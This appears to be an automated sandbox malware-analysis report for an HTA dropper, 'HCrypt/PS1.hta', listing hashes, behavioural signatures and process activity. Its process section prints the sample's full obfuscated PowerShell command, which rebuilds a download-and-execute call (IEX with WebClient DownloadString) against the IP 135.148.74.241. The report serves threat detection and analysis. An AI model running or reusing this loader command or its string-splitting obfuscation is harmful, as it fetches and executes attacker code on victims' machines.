Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
20-01-2022 14:32
Static task
static1
Behavioral task
behavioral1
Sample
135.148.74.241_HCrypt/PS1.hta
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
135.148.74.241_HCrypt/PS1.hta
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
135.148.74.241_HCrypt/new/ExeToHta.txt.html
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
135.148.74.241_HCrypt/new/ExeToHta.txt.html
Resource
win10v2004-en-20220112
General
-
Target
135.148.74.241_HCrypt/PS1.hta
-
Size
3KB
-
MD5
37f9dc388fedc16b308acaadc34c2054
-
SHA1
25c936c0b399b82ad39363f6237fd5db13369bda
-
SHA256
f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3
-
SHA512
f7a335e8b559079ea7b8d8d9341f0d13e3b7c23af4858d87f350df698f2580e83a7c3e84a69cdb003f83b68127a45943cfbb5cd11c44cc3a8446fb30ace85fc4
Malware Config
Extracted
http://135.148.74.241/PS1_B.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1468 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
mshta.exedescription pid process target process PID 760 wrote to memory of 1468 760 mshta.exe powershell.exe PID 760 wrote to memory of 1468 760 mshta.exe powershell.exe PID 760 wrote to memory of 1468 760 mshta.exe powershell.exe PID 760 wrote to memory of 1468 760 mshta.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1468-53-0x0000000075D61000-0x0000000075D63000-memory.dmpFilesize
8KB
-
memory/1468-56-0x0000000002560000-0x00000000031AA000-memory.dmpFilesize
12.3MB
-
memory/1468-57-0x0000000002560000-0x00000000031AA000-memory.dmpFilesize
12.3MB
-
memory/1468-58-0x0000000002560000-0x00000000031AA000-memory.dmpFilesize
12.3MB